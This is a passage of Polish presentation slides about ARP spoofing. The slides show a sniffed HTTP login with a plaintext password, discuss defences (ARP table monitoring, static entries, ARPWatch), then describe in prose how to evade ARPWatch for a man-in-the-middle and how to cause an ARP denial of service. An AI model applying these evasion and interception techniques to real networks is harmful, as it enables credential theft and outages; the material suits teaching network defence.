86 at at at 00:01:AC:21:EE:A0 IP: /24 MAC: 00:C0:4F:17:B3:F8 IP: /24 MAC: Src : 00:50:DA:3B:F8:86 Dst : 00:C0:4F:17:B3:F8 IpDest : IpSrc : Destport : HTTP (80) at 00:50:DA:3B:F8: at 00:C0:4F:17:B3:F8 POST /? HTTP 11 (application/xwww-form-urlencoded) User : admin Password : kokoszka 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: / at at at 00:01:AC:21:EE:A0 MAC: 00:50:DA:3B:F8:86

87 at at at 00:01:AC:21:EE:A0 IP: /24 MAC: 00:C0:4F:17:B3:F8 IP: /24 MAC: Src : 00:50:DA:3B:F8:86 Dst : 00:C0:4F:17:B3:F8 IpDest : IpSrc : Destport : HTTP (80) at 00:50:DA:3B:F8: at 00:C0:4F:17:B3:F8 POST /? HTTP 11 (application/xwww-form-urlencoded) User : admin Password : kokoszka 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: / at at at 00:01:AC:21:EE:A0 MAC: 00:50:DA:3B:F8:86

88 at at at 00:01:AC:21:EE:A0 IP: /24 MAC: 00:C0:4F:17:B3:F8 IP: /24 MAC: at 00:50:DA:3B:F8: at 00:C0:4F:17:B3:F8 Src : 00:50:DA:3B:F8:86 Dst : 00:C0:4F:17:B3:F8 IpDest : IpSrc : Destport : HTTP (80) POST /? HTTP 11 (application/xwww-form-urlencoded) User : admin Password : kokoszka 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: / at at at 00:01:AC:21:EE:A0 MAC: 00:50:DA:3B:F8:86

89 at at at 00:01:AC:21:EE:A0 IP: /24 MAC: 00:C0:4F:17:B3:F8 IP: /24 MAC: at 00:50:DA:3B:F8: at 00:C0:4F:17:B3:F8 Src : 00:50:DA:3B:F8:86 Dst : 00:C0:4F:17:B3:F8 IpDest : IpSrc : Destport : HTTP (80) POST /? HTTP 11 (application/xwww-form-urlencoded) User : admin Password : kokoszka 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: / at at at 00:01:AC:21:EE:A0 MAC: 00:50:DA:3B:F8:86

90 at at at 00:01:AC:21:EE:A0 IP: /24 MAC: 00:C0:4F:17:B3:F8 IP: /24 MAC: at 00:50:DA:3B:F8: at 00:C0:4F:17:B3:F8 Src : 00:50:DA:3B:F8:86 Dst : 00:C0:4F:17:B3:F8 IpDest : IpSrc : Destport : HTTP (80) POST /? HTTP 11 (application/xwww-form-urlencoded) User : admin Password : kokoszka 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: /24 MAC: 00:50:DA:3B:F8: at at at 00:01:AC:21:EE:A0

91 at at at 00:01:AC:21:EE:A0 IP: /24 Src : 00:50:DA:3B:F8:86 MAC: 00:C0:4F:17:B3:F8Dst : 00:C0:4F:17:B3:F8 IpDest : IpSrc : Destport : HTTP (80) POST /? HTTP 11 (application/xwww-form-urlencoded) User : admin Password : kokoszka IP: /24 MAC: at 00:50:DA:3B:F8: at 00:C0:4F:17:B3:F8 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: / at at at 00:01:AC:21:EE:A0 MAC: 00:50:DA:3B:F8:86

92 Nietrudno zauważyć, że w tej technice stajemy się po prostu punktem pośrednim między bramą a komputerem ofiary Nie wszystko jednak jest takie piękne, bo przecież Pan Bartłomiej Solarz jakoś się zorientował i wszedł na RSO z pytaniem Kto ma laptopa Dell a ;-) Po pierwsze zdradza nas fakt, że tablica ARP na bramie posiadała 2 adresy IP powiązane z tym samym MAC iem Po drugie brama dostała odpowiedź ARP nie zadając pytania Jak to powiedział Pan Solarz : w normalnej sieci to by przeszło Zastanówmy się skąd dobry administrator wie, że ktoś spoof uje, czyli innymi słowy, jak się przed tym zabezpieczyć?

93 Metoda 1 Siedzimy i gapimy się na tablice ARP na bramie Jeśli ktoś spoof uje to pojawią się 2 adresy IP powiązane z tym samym adresem MAC Albo tcpdump i eth0 ARP i patrzymy czy dostajemy odpowiedź ARP nie zadawszy pytania Osobiście jednak nie polecam tej techniki, z oczywistych względów ;-)

94 Metoda 1 Siedzimy i gapimy się na tablice ARP na bramie Jeśli ktoś spoof uje to pojawią się 2 adresy IP powiązane z tym samym adresem MAC Albo tcpdump i eth0 ARP i patrzymy czy dostajemy odpowiedź ARP nie zadawszy pytania Osobiście jednak nie polecam tej techniki, z oczywistych względów ;-) Metoda 2 Statyczne tablice ARP Czyli tworzymy na stałe pary IP-MAC Ok, ale co jeśli mamy 253 hosty do powiązania, na każdej maszynie! Czyli 253 razy robimy 253 wpisy A co jeśli nam jakaś karta sieciowa padnie? 253 razy zmieniamy tablice ARP + dodajemy 253 wpisów na komputerze z nową kartą sieciową ;-) Nie polecam!

95 Metoda 3 ARPWatch narzędzie monitorujące protokół ARP ARPWatch kontroluje tablice ARP hosta na którym działa, jak i obserwuje przychodzące odpowiedzi ARP ARPWatch nie blokuje, tylko wykrywa i informuje o tym, że może mieć miejsce spoofing Tak właśnie Pan Solarz mnie namierzył (przyznał się ;-) )

96 Metoda 3 ARPWatch narzędzie monitorujące protokół ARP ARPWatch kontroluje tablice ARP hosta na którym działa, jak i obserwuje przychodzące odpowiedzi ARP ARPWatch nie blokuje, tylko wykrywa i informuje o tym, że może mieć miejsce spoofing Tak właśnie Pan Solarz mnie namierzył (przyznał się ;-) ) Zapewne istnieją jeszcze inne metody obrony przed tego typu atakami, ja jednak nie spotkałem się z innymi technikami, zainteresowanych odsyłam do sieci

97 Jest jednak sposób obejścia ARPWatch a ;-) Jestem pewny, że nie odkryłem ameryki i ktoś, gdzieś wpadł już na to Ja jednak doszedłem do tego sam, wytestowałem na biurku i działa

98 Jest jednak sposób obejścia ARPWatch a ;-) Jestem pewny, że nie odkryłem ameryki i ktoś, gdzieś wpadł już na to Ja jednak doszedłem do tego sam, wytestowałem na biurku i działa Do rzeczy! Skoro brama śledzi protokół ARP, to czy można obejść bramę?

99 Jest jednak sposób obejścia ARPWatch a ;-) Jestem pewny, że nie odkryłem ameryki i ktoś, gdzieś wpadł już na to Ja jednak doszedłem do tego sam, wytestowałem na biurku i działa Do rzeczy! Skoro brama śledzi protokół ARP, to czy można obejść bramę? Można, ale jak?

100 Jest jednak sposób obejścia ARPWatch a ;-) Jestem pewny, że nie odkryłem ameryki i ktoś, gdzieś wpadł już na to Ja jednak doszedłem do tego sam, wytestowałem na biurku i działa Do rzeczy! Skoro brama śledzi protokół ARP, to czy można obejść bramę? Można, ale jak? Ok, pytanie : Czego host ofiary oczekuje od bramy?

101 Jest jednak sposób obejścia ARPWatch a ;-) Jestem pewny, że nie odkryłem ameryki i ktoś, gdzieś wpadł już na to Ja jednak doszedłem do tego sam, wytestowałem na biurku i działa Do rzeczy! Skoro brama śledzi protokół ARP, to czy można obejść bramę? Można, ale jak? Ok, pytanie : Czego host ofiary oczekuje od bramy? Routingu, dajmy mu więc ten routing innymi słowy stańmy się bramą Wówczas zatruć musimy tylko hosta ofiary (na którym nie ma ARPWatch a, a nawet jak jest to nie poinformuje o tym admina tylko nas ;-) )

102 Jest jednak małe ale Potrzebujemy drugiego łącza (z wyjściem na świat np jakieś po dial-up ie albo UMTS), żeby podnieść interfejs i zrobić NAT a Wówczas ofiara wyśle pakiety do nas My mu je zsnatujemy (mamy ruch wychodzący - hasła) Odpowiedź z serwera przyjdzie na adres naszego interfejsu NAT ujacego i trafi z powrotem do hosta ofiary (mamy ruch przychodzący) Jesteśmy po środku jesteśmy zbieramy ruch zbieramy, a więc Man In The Middle nie inaczej ;-) Podobnie można zrobić DoS a wysyłamy do hosta ofiary fałszywą odpowiedź ARP mówiącą, że brama jest na adresie MAC i tutaj wstawiamy wymyślony MAC Host ofiary będzie starał się komunikować z bramą tworząc ramki z nieprawidłowym polem adres docelowy Komunikacja nie nastąpi czyli DoS, nie ma Internetu ;-)

103 Z tej samej serii mogę przygotować: Sniffowanie w sieciach bezprzewodowych - WEP cracking - WPA dictionary attack

104 Dziękuję za uwagę, mam nadzieję że się podobało